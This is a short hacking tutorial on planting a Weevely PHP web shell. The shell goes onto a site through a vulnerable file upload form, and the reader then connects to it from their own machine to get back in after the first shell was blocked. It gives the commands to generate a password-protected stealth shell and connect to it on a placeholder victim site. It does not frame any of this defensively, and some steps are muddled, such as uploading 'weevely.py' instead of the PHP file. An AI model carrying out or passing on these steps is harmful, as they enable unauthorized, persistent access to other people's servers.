[EXPLOIT] Backconnect with Weevely

Backconnect with Weevely

Backconnect usually used for a proxy server or firewall closeted. so it can not be done remotely connect. So one trick is to reverse connections, which connect from the server to your computer

Things required

1. Weevely
2. Python
3. Vulnerable file upload site

How to install weevely?

Click here

How to backconnect?

1- In my case, i already have a vulnerable site and i am able to upload shell. But, after a few seconds accessing the server through the shell, the connection was stopped and it says "Access Denied"

2- So, to bypass this, i will try to access the server again by backconnect using weevely

3- Firstly, open up Command prompt, type in:

cd\
cd \weevely\

 4- Now, to execute the weevely.py, type in this command:

weevely.py

or

C:\python27\python.exe weevely.py

 5- Alright, now we are going to generate a stealth shell with password. Type in this command

weevely.py generate pass123

or

C:\python27\python.exe weevely generate pass123

6- You can rename weevely.php to anything as you like, okay, now upload weevely.py into the site

7- If you access the weevely.php through the web browser, it will show a blank page, but it doesn't meant it failed.

8- To access you weevely shell, type in the cmd:

weevely.py http://www.victimsite.com/weevely.php pass123

or

 C:\python27\python.exe weevely.py http://www.victimsite.com/weevely.php pass123

 9- Now we got access! Once you're logged in, you can do anything

cd - For changing directory

dir or ls - For directory listing

 

10- Type :help for more commands

NOTE* If you got the message as below, it means that the weevely shell is not accessible